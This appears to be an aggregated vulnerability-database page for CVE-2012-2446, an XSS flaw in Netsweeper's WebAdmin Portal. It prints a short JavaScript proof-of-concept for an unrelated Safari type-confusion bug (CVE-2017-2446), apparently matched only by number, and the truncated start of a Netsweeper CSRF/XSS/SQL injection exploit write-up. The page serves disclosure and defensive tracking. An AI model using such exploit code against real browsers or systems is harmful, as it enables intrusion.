CVE-2012-2446
Published 2012-07-09
Priority P4 · 17 · medium · CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.06% (60.2th percentile)
Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in the WebAdmin Portal in Netsweeper allows remote attackers to inject arbitrary web script or HTML via the group parameter in a lookup action.
GHSA
ghsa_unreviewed·2022-05-17
CVE-2012-2446 [MEDIUM] CWE-79 GHSA-mq9w-jgw2-mvrp: Cross-site scripting (XSS) vulnerability in tools/local_lookup
GHSA
ghsa_unreviewed·2022-05-17·CVSS 4.3
CVE-2012-3859 [MEDIUM] GHSA-xcw4-g6h8-wpcq: Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and
Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and CVE-2012-2447.
No detection rules found.
Exploit-DB
exploitdb·2017-03-27
CVE-2017-2446 Apple Safari - 'DateTimeFormat.format' Type Confusion
---
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
var i = new Intl.DateTimeFormat();
//print(i);
var q;
function f(){
    //print("in f");
    //print(f.caller);
    q = f.caller;
    return 10;
}
try{
    i.format({valueOf : f});
}catch(e){
    //print("problem");
}
//print(q);
q.call(0x77777777);
Exploit-DB
exploitdb·2012-09-17·CVSS 4.3
CVE-2012-3859 [MEDIUM] Netsweeper WebAdmin Portal - Multiple Vulnerabilities
---
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and SQL Injection ("The later")
# Date: Discovered and reported CSRF and XSS 4/2012 and "The later" 7/2012
# Author: Jacob Holcomb/Gimppy042
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)
# CVE: CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and CVE-2012-3859 for the SQL Injection ("The later")
NOTE:
# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.
CSRF Exploitation:
In the following example we use CSRF to forge a HTTP POST request that will cr
No writeups or analysis indexed.